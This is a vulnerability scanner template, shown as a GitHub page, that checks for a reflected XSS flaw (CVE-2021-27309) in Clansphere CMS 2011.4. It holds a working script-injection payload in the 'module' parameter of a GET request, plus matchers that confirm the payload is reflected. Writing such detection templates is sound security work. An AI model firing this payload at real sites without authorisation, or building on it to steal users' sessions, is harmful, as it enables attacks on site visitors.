-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-27309.yaml
42 lines (36 loc) · 1.12 KB
/
CVE-2021-27309.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
id: CVE-2021-27309
info:
name: Clansphere CMS 2011.4 - Reflected XSS
author: edoardottt
severity: medium
description: |
Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "module" parameter.
reference:
- https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27309
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-27309
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2021,clansphere,xss,cms,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"></script><script>alert(document.domain)</script>.php'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200